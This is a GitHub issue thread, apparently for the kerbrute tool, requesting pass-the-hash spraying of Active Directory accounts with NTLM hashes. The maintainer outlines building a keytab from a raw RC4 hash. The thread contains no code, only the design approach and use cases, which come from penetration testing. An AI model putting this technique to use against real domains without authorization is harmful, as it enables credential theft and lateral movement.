kerbrute icon indicating copy to clipboard operation
kerbrute copied to clipboard

Published 20 hours ago verified publisher icon ropnop

[Feature Request] Pass the Hash Support

Open IppSec opened this issue 3 years ago • 3 comments

It would be nice to have the ability to spray user accounts with NTLM Hashes. The two main use cases I imagine for this is:

  • Pulling an NTLM Hash off a local workstation, then spraying AD to look for password re-use
  • Testing passwords from domain controller backups (old copies of NTDS.DIT).

Currently, this can be done with https://github.com/3gstudent/pyKerbrute, but is an extremely hacky solution using Python2.

IppSec avatar Apr 07 '21 13:04 IppSec

Good idea! This would require a bit of hack in gokrb5 but it can work. Basically instead of calling client.NewWithPassword, we'll call client.NewWithKeytab and manually create at temporary keytab with the NTLM hash as the encryption key. The "hack" will just be to change the library so it can accept a raw encryption key in RC4 instead of the expected plaintext password when calling AddEntry. Should have a workign branch in a few days - do you have a lab you could test in? My AD lab is down unfortunately I don't even have a working DC I can try kerbrute against at the moment

ropnop avatar Apr 07 '21 14:04 ropnop

Any updates on this subject? I can help with testing.

P4cm4n90 avatar Nov 10 '22 08:11 P4cm4n90

i can help too

TryA9ain avatar Mar 06 '23 05:03 TryA9ain